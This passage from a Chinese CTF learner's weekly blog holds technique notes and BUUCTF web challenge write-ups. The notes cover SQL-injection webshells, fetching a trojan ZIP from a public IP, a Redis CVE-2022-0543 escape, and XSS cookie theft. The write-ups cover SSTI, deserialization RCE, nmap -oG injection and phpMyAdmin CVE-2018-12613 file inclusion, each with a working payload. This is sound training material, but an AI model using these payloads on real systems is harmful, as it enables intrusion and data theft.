8.jwt密码爆破,在得知密码的组成或大致范围之后,可以生成字典进行爆破,用jwtcrack-master,命令组成为python.exe .\crackjwt.py 当前cookie .\字典文件,需要放在根目录下<br> 9.cms类题后台任意文件下载,任意文件解压漏洞。若容器出网,在公网服务器上放置包含 PHP 木马的 ZIP 文件,再在题目上触发下载ZIP,触发解压之后运行对应文件中的php木马执行任意命令,例如下载filepath=apidata&action=start-download&type=0&download_url=http://公网IP/payload.zip解压filepath=apidata&action=file-upzip。若容器不出网,就需要先上传ZIP到服务器,再下载解压运行。<br> 10.ROT13字母替换密码,凯撒密码的一种,偏移量固定为13,文件目录或者flag格式有问题的时候可以试一下是不是移位加密过了<br> 11.__toString()是POP链的常见入口点,我们可以在其中调用其他方法或访问其他属性<br> 12.原型链污染中,通过修改原型对象,影响所有基于该原型的对象。process.env 包含所有环境变量,其中子进程会继承父进程的环境变量,NODE_OPTIONS特殊环境变量,用于传递命令行参数,child_process.fork()创建Node.js子进程,而后execSync()同步执行系统命令。通过这样,就可以通过环境变量执行任意代码,例如:require("child_process").execSync("目的命令 | base64 -d > /app/index.js")//<br> 13.如果在题目中需要更改或创建对象,应该使用put请求<br> 
14.XSS跨站脚本攻击,XSS题目的典型就是有一个bot,flag通常就在这个bot的cookie里面。我们可以通过找到一处能够输入并查看的地方写入一个恶意代码到服务端,让bot去访问运行它,进而获得cookie。拿到cookie之后的回显问题,如果题目出网,可以写命令让它发送到我们的服务器上面;如果不出网,就可以写一个JS代码让bot模拟用户操作,将Cookie在之前找到的输入点进行读取<br> 15.Redis命令执⾏沙箱逃逸,CVE-2022-0543,Redis的Lua环境是一个公共Lua库,我们可以利用Lua的 package.loadlib函数,加载这个系统库,并调用其中的危险函数,从而执行任意命令。例如:先通过local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”);找到目的package.loadlib函数,local io = io_l();提取表中的危险函数,local f = io.popen(“指定命令”, “r”);r用读取模式启动命令,返回一个文件句柄,将其保存在变量f中,local res = f:read(“*a”);结果保存在res中,return res返回res<br> 16.sql注入中若题目提示flag不在数据库,那么我们就需要getshell写入后门文件,写一个木马,例如:-1’union select 1,2,”<?php eval($_GET[1]);” into outfile “/var/www/html/1.php”–+再通过get的参数执行任意命令</p><h3 id="本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练"><a href="#本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练" class="headerlink" title="本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练"></a>本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练</h3><p>下周学习计划:再次尝试一下极客大挑战,多做一点buu的题,看能不能遇到新学的知识点,把知识点实战巩固一下</p><h1 id="11-17—11-23周"><a href="#11-17—11-23周" class="headerlink" title="11.17—11.23周"></a>11.17—11.23周</h1><p>本周总结:这周buu崩了,我也崩了,一直发烧,没有爽做题,也没有爽打游戏,不开心的一周,但是还是学到了一些新知识,也算是很开心的事情了。个人博客也搭建的差不多了,等明年1月前后域名备案之后应该就可以正式上线了,欢迎各位来玩~</p><h2 id="1-网鼎杯-2020-朱雀组-phpweb"><a href="#1-网鼎杯-2020-朱雀组-phpweb" class="headerlink" title="1.[网鼎杯 2020 朱雀组]phpweb"></a>1.[网鼎杯 2020 朱雀组]phpweb</h2><p>拿到题目访问一下,发现页面会自动刷新<img src="https://i-blog.csdnimg.cn/blog_migrate/61ab71c9a8c1f112c4aa569493eabf01.png" alt="在这里插入图片描述"></p><p>所以我们抓一下包<img src="https://i-blog.csdnimg.cn/blog_migrate/0499789c8210a128e0974eab7566e652.png" alt="在这里插入图片描述"></p><p>很明显date是一个php的函数,而p是其中的一个参数,表示输出时间。<br> 因此我们可以执行一下eval函数<img 
src="https://i-blog.csdnimg.cn/blog_migrate/38e13c463a71604b8ad38c4b23431990.png" alt="在这里插入图片描述"></p><p>很明显,被拦了。这时候我们可以考虑一下读取index.php的<a href="https://so.csdn.net/so/search?q=%E6%BA%90%E7%A0%81&spm=1001.2101.3001.7020">源码</a><br> 利用highlight_file函数</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">func=highlight_file&p=index.php</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/9d9c7b41aa43fcf74f9a23cabf699ae3.png" alt="在这里插入图片描述"></p><p>得到<img src="https://i-blog.csdnimg.cn/blog_migrate/b4a1faaca13d98e591bce854f293a0a1.png" alt="在这里插入图片描述"></p><p>很明显这里的Test就是读取了func,需要你构造一个反序列化去绕过。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span>{</span></span><br><span class="line"> var $p=<span class="string">"ls /"</span>;</span><br><span class="line"> var $func=<span class="string">"system"</span>;</span><br><span class="line">}</span><br><span class="line">$a =new Test();</span><br><span class="line">echo <span class="title function_">serialize</span><span class="params">($a)</span>;</span><br></pre></td></tr></table></figure><p>得到payload:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">func=unserialize&p=O:<span class="number">4</span>:<span class="string">"Test"</span>:<span class="number">2</span>:{s:<span class="number">1</span>:<span class="string">"p"</span>;s:<span class="number">4</span>:<span class="string">"ls 
/"</span>;s:<span class="number">4</span>:<span class="string">"func"</span>;s:<span class="number">6</span>:<span class="string">"system"</span>;}</span><br></pre></td></tr></table></figure><p>传入后得到<img src="https://i-blog.csdnimg.cn/blog_migrate/0d048bb3fe8859531ccef783e7b1d690.png" alt="在这里插入图片描述"></p><p>然后</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#构造payload</span><br><span class="line">#反序列化前的语句:find / -name flag*</span><br><span class="line">func=unserialize&p=O:<span class="number">4</span>:<span class="string">"Test"</span>:<span class="number">2</span>:{s:<span class="number">1</span>:<span class="string">"p"</span>;s:<span class="number">18</span>:<span class="string">"find / -name flag*"</span>;s:<span class="number">4</span>:<span class="string">"func"</span>;s:<span class="number">6</span>:<span class="string">"system"</span>;}</span><br></pre></td></tr></table></figure><p>找到存有flag 的文件夹<code>/tmp/flagoefiu4r93</code><img src="https://i-blog.csdnimg.cn/blog_migrate/25ddf6edb5f2f5f1166a221a8d35afce.png" alt="在这里插入图片描述"></p><p>最后找出flag:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#构造payload</span><br><span class="line">#反序列化前的语句:cat /tmp/flagoefiu4r93</span><br><span class="line">func=unserialize&p=O:<span class="number">4</span>:<span class="string">"Test"</span>:<span class="number">2</span>:{s:<span class="number">1</span>:<span class="string">"p"</span>;s:<span class="number">22</span>:<span class="string">"cat /tmp/flagoefiu4r93"</span>;s:<span class="number">4</span>:<span class="string">"func"</span>;s:<span class="number">6</span>:<span 
class="string">"system"</span>;}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/0407b52a419ce0fecb90cd14ac4d439d.png" alt="img"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag{1ffa98ad-ba5d-4ce9-83b1-bdbaa1b54302}</span><br></pre></td></tr></table></figure><h2 id="2-BJDCTF2020-The-mystery-of-ip"><a href="#2-BJDCTF2020-The-mystery-of-ip" class="headerlink" title="2.[BJDCTF2020]The mystery of ip"></a>2.[BJDCTF2020]The mystery of ip</h2><p><img src="https://i-blog.csdnimg.cn/blog_migrate/72973b03e737b882008029f2636feeb1.png" alt="在这里插入图片描述"></p><p>查看<code>hint</code>页面:<img src="https://i-blog.csdnimg.cn/blog_migrate/1c376f24aee082031d903098b92fbb32.png" alt="在这里插入图片描述"></p><p>结合题目名,IP的秘密,flag页面也出现了IP,猜测为X-Forwarded-For处有问题<br> 使用BurpSuite抓取数据包:</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/2df1f822baec2dc8fd6a1b552697fa3d.png" alt="在这里插入图片描述"></p><p>添加HTTP请求头:<img src="https://i-blog.csdnimg.cn/blog_migrate/4b5c788c40f1e9cefe95bab962d3c6ec.png" alt="在这里插入图片描述"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: <span class="number">1</span></span><br></pre></td></tr></table></figure><p>发送数据包,得到回显页面:<img src="https://i-blog.csdnimg.cn/blog_migrate/27e5f7d7c94f4abba69119b7a247d30f.png" alt="在这里插入图片描述"></p><p>被成功执行,说明<code>XFF</code>可控,测试了半天,因为是php页面,所以没想到模版注入,通过查阅资料<br> <strong>Flask</strong>可能存在<strong>Jinjia2模版注入漏洞</strong><br> <strong>PHP</strong>可能存在<strong>Twig模版注入漏洞</strong></p><p>添加模版算式,检测其是否可被执行:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: {{<span class="number">7</span>*<span class="number">7</span>}}</span><br></pre></td></tr></table></figure><p><img 
src="https://i-blog.csdnimg.cn/blog_migrate/a02b080edbb2b0a10b2bb407a5d71dc2.png" alt="在这里插入图片描述"></p><p>模版中算式被成功执行,尝试是否能执行命令:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: {{<span class="title function_ invoke__">system</span>(<span class="string">'ls'</span>)}}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/06ada0dd7119b1322a047c38b4354245.png" alt="在这里插入图片描述"></p><p>命令可以被成功执行,查找flag的位置:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: {{<span class="title function_ invoke__">system</span>(<span class="string">'ls /'</span>)}}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/d638903efee7930af9721aa3f70f2423.png" alt="在这里插入图片描述"></p><p>在<code>/</code>目录下查找到flag,读取flag,构造payload:</p><img src="https://i-blog.csdnimg.cn/blog_migrate/efb5faa8e51142048bd12d3b2722154d.png" alt="在这里插入图片描述" style="zoom:150%;" /><h2 id="3-BJDCTF2020-ZJCTF,不过如此"><a href="#3-BJDCTF2020-ZJCTF,不过如此" class="headerlink" title="3.[BJDCTF2020]ZJCTF,不过如此"></a>3.[BJDCTF2020]ZJCTF,不过如此</h2><p>php特性</p><p>1.先看代码,提示了next.php,绕过题目的要求去回显next.php</p><p>2.可以看到要求存在text内容而且text内容强等于后面的,而且先通过这个if才能执行下面的file参数。</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/c1573b707aabe1d7cc04542ba758e166.png" alt="img"></p><p>3.看到用的是file_get_contents()函数打开text。想到用data://协议,可以想成创建了临时文件读取</p><p>?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php</p><p>得到页面源码,接着base64解码</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/0bfe0c67bc61ad2d596ba43c571ea9e3.png" alt="image-20240124204402834"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">?php</span><br><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[<span class="string">'id'</span>];</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'id'</span>] = <span class="variable">$id</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">complex</span>(<span class="params"><span class="variable">$re</span>, <span class="variable">$str</span></span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">preg_replace</span>(</span><br><span class="line"> <span class="string">'/('</span> . <span class="variable">$re</span> . <span class="string">')/ei'</span>,</span><br><span class="line"> <span class="string">'strtolower("\\1")'</span>,</span><br><span class="line"> <span class="variable">$str</span></span><br><span class="line"> );</span><br><span class="line">}</span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$re</span> => <span class="variable">$str</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="title function_ invoke__">complex</span>(<span class="variable">$re</span>, <span class="variable">$str</span>). 
<span class="string">"\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"> @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">'cmd'</span>]);</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>参数可以不管</p><p>可以看出,先传参执行complex,来执行getFlag()获得flag</p><p>可以先看下面,是其中代码解释</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/1fa9fede43fc7f562b8a19d4fc68260f.png" alt="image-20240124204821112"></p><p>在页面传参后使$re值为参变量123 $str值为${getflag()},来传入complex函数</p><p>这里解题的关键就是<code>preg_replace()+/e</code>存在代码执行漏洞</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/next.php?\S*=${<span class="title function_ invoke__">getflag</span>()}&cmd=<span class="title function_ invoke__">system</span>(<span class="string">'cat /flag'</span>);</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/6eaf7473b475be2a149d26c64aa59647.png" alt="image-20240124211307795"></p><h2 id="4-BUUCTF-2018-Online-Tool"><a href="#4-BUUCTF-2018-Online-Tool" class="headerlink" title="4.[BUUCTF 2018]Online Tool"></a>4.[BUUCTF 2018]Online Tool</h2><p>首先要知道这escapeshellarg()和escapeshellcmd()两个函数组合会产生漏洞<img src="https://i-blog.csdnimg.cn/direct/ee438dc5781d43fc98e4a1053f04f0e9.png" alt="img"></p><p>首先看题,接收一个host参数,值自定义,结合字符串经过md5加密后创建目录并切换至目录(这里其实就可以联想到写文件了,创建了目录就是来放东西的)</p><p>执行了nmap命令,这里构造payload利用了nmap中的-oG方法,可以实现将命令和结果写到文件</p><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">?h</span>ost=<span class="string">' <?php echo `cat /flag`;?> -oG test.php 
'</span></span><br></pre></td></tr></table></figure><p>首先payload经过escapeshellarg()函数后会自动套上一对单引号并对内部单引号转义</p><p>即</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>\<span class="string">''</span> <span class="meta"><?php</span> <span class="keyword">echo</span> `cat /flag`;<span class="meta">?></span> -oG test.php <span class="string">'\''</span><span class="string">'</span></span><br></pre></td></tr></table></figure><p>最外层单引号是函数添加的</p><p>内部单引号被\转义,\也被添加上双引号</p><p>进入escapeshellcmd()函数后对\和不成对的单引号进行转义</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>\\<span class="string">''</span> <span class="meta"><?php</span> <span class="keyword">echo</span> `cat /flag`;<span class="meta">?></span> -oG test.php <span class="string">'\\'</span><span class="string">''</span></span><br></pre></td></tr></table></figure><p>这里单引号将payload分成了多份</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span> \\ <span class="string">''</span> <span class="meta"><?php</span>......php <span class="string">'\\'</span> <span class="string">''</span></span><br></pre></td></tr></table></figure><p>这样payload就不会被单引号包裹,可以正常执行命令了</p><p>值得注意的是,因为后端是linux系统,在linux中,\代表转义符,system执行命令的参数是string类型,转义了也能正常执行,没被单引号包裹的\就是,被单引号包裹的仍是\</p><p>第二个值得注意的地方是:</p><p>最后的payload要加空格和’</p><p>不加空格最后文件名变为test.php\,会被解析为路径,test.php \后面的\会被忽略</p><p>不加单引号会变成test.php’,都无法正常执行<img src="https://i-blog.csdnimg.cn/direct/82e59df37b2e48e88878c7b109814712.png" alt="img"></p><h2 id="5-GXYCTF2019-禁止套娃"><a href="#5-GXYCTF2019-禁止套娃" class="headerlink" title="5.[GXYCTF2019]禁止套娃"></a>5.[GXYCTF2019]禁止套娃</h2><h3 id="这个题重点在于无参数绕过"><a href="#这个题重点在于无参数绕过" 
class="headerlink" title="这个题重点在于无参数绕过"></a>这个题重点在于无参数绕过</h3><p>首先来看一下这个界面</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/1457dfbfaf04375105c58b4cdeb3c947.png" alt="img"></p><p>查看源代码,目录文件扫描以及<a href="https://so.csdn.net/so/search?q=%E6%8A%93%E5%8C%85&spm=1001.2101.3001.7020">抓包</a>都没什么有价值的信息。但是web题如果没有什么功能页面,一定有什么提示。若提示也没有,一般就泄露了文件或者源码等。这题就是源码泄露 。使用GitHack</p><p>打开index的源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"flag在哪里呢?<br>"</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'exp'</span>])){</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">'/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i'</span>, <span class="variable">$_GET</span>[<span class="string">'exp'</span>])) {</span><br><span class="line"> <span 
class="keyword">if</span>(<span class="string">';'</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[a-z,_]+\((?R)?\)/'</span>, <span class="literal">NULL</span>, <span class="variable">$_GET</span>[<span class="string">'exp'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">'/et|na|info|dec|bin|hex|oct|pi|log/i'</span>, <span class="variable">$_GET</span>[<span class="string">'exp'</span>])) {</span><br><span class="line"> <span class="comment">// echo $_GET['exp'];</span></span><br><span class="line"> @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">'exp'</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"还差一点哦!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"再好好想想!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"还想读flag,臭弟弟!"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>很明显,源码存在三层过滤。</p><p>1.第一层,过滤了伪协议,这里不考虑伪协议使用</p><p>2.正则表达式,/[a-z,_]+/</p><p> [a-z,_]:匹配字符与下划线</p><p> +:可匹配前一个表达式多次</p><p> (?R):整个表达式迭代匹配</p><p> (?R)?:允许”()”内出现1个或0个 
比如:c(a()b()),c(a())</p><pre><code>所以这个正则表达式含义是匹配var_dump(scandir())这种无参数命令执行</code></pre><p>3.过滤了一些函数</p><p>scandir(‘.’)是返回当前目录,虽然我们无法传参,但是由于localeconv() 返回的数组第一个就是‘.’,current()取第一个值,那么current(localeconv())就能构造一个‘.’,那么以下就是一个简单的返回查看</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>())));</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/b0e0ad8a87365b4e05e3c1bdad208de7.png" alt="img"></p><p>查看到flag.php在当先数组的第4个位置,所以需要移动指针</p><p> end(),next() ,prev() ,reset() ,each()好像不能重复套娃</p><p>因为flag在倒数第二个位置,所以反转数组,在移动指针到下一个即可</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">next</span>(<span class="title function_ invoke__">array_reverse</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>()))))));</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/3ad1f535fcc5411a3dae1d41f9e36365.png" alt="img"></p><h2 id="6-GWCTF-2019-我有一个数据库"><a href="#6-GWCTF-2019-我有一个数据库" class="headerlink" title="6.[GWCTF 2019]我有一个数据库"></a>6.[GWCTF 2019]我有一个数据库</h2><p>上来一堆乱码还原:</p><p>扫一遍发现数据库登陆页面<img src="https://i-blog.csdnimg.cn/blog_migrate/b4fd1660e79e133613a624728be23c33.png" alt="在这里插入图片描述"></p><p>CVE-2018-12613-PhpMyadmin后台文件包含<img src="https://i-blog.csdnimg.cn/blog_migrate/67da621d97255400cac203a8977468e8.png" 
 alt="在这里插入图片描述"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line"> && <span class="title function_ invoke__">is_string</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line"> && ! <span class="title function_ invoke__">preg_match</span>(<span class="string">'/^index/'</span>, <span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line"> && ! <span class="title function_ invoke__">in_array</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>], <span class="variable">$target_blacklist</span>)</span><br><span class="line"> && <span class="title class_">Core</span>::<span class="title function_ invoke__">checkPageValidity</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line">) {</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">'target'</span>];</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>target_blacklist contains nothing of interest.</p><p>Core::checkPageValidity($_REQUEST['target']) is the Core class's parameter validation method:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkPageValidity</span>(<span class="params">&<span class="variable">$page</span>, <span class="keyword">array</span> <span class="variable">$whitelist</span> = []</span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="variable">$whitelist</span> = <span class="built_in">self</span>::<span class="variable">$goto_whitelist</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (! 
<span class="keyword">isset</span>(<span class="variable">$page</span>) || !<span class="title function_ invoke__">is_string</span>(<span class="variable">$page</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(</span><br><span class="line"> <span class="variable">$page</span>,</span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"> <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$page</span> . 
<span class="string">'?'</span>, <span class="string">'?'</span>)</span><br><span class="line"> );</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$_page</span> = <span class="title function_ invoke__">urldecode</span>(<span class="variable">$page</span>);</span><br><span class="line"> <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(</span><br><span class="line"> <span class="variable">$_page</span>,</span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"> <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$_page</span> . 
<span class="string">'?'</span>, <span class="string">'?'</span>)</span><br><span class="line"> );</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>target=db_datadict.php?/…/…/…/…/…/…/…/…/flag</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/23117c8e2d209c8eb16bbfdc442bd0cb.png" alt="在这里插入图片描述"></p><h2 id="下周目标"><a href="#下周目标" class="headerlink" title="下周目标"></a>Goals for next week</h2><p>Hopefully I won't get sick next week (); as long as BUU stays up, I'll catch up on this week's unfinished challenges and meet next week's target.</p><h1 id="11-24—11-30周"><a href="#11-24—11-30周" class="headerlink" title="11.24—11.30周"></a>Week of 11.24—11.30</h1><p>Weekly summary: this week I basically finished reproducing all of the NewStar 2025 challenges; the worthwhile ones are written up in this weekly report, and the trivial ones were left out. Overall, this year's NewStar was easier than last year's, but there were still some well-designed, very instructive challenges (PS: the last challenge of week 5 is still not solved; I'll keep working on it next week). I also did a few BUU challenges, but I feel I didn't learn that much this week; I'll keep at it next week.</p><p>Meanwhile, I found time to further summarize and condense the excellent work 《你缺失的那门计算机课》 (The Missing Computer Course) and published it on my blog, where it will be updated continuously. The goal is to let complete beginners who have never touched a computer get up to speed quickly. If you have classmates or friends who need this, feel free to use it (); I'll attach the URL at the end of the post.</p><p>Only after finishing and uploading it to Feishu did I realize that the images are all hosted on my own image host and cannot be seen in the cloud document, sigh. I've updated it on my blog, so just read it there --><a href="https://shaneior.github.io/2025/11/23/UKY%E5%91%A8%E6%8A%A5/">https://shaneior.github.io/2025/11/23/UKY%E5%91%A8%E6%8A%A5/</a></p><h1 id="1-NCTF2019-Fake-XML-cookbook"><a href="#1-NCTF2019-Fake-XML-cookbook" class="headerlink" title="1. [NCTF2019]Fake XML cookbook"></a>1. 
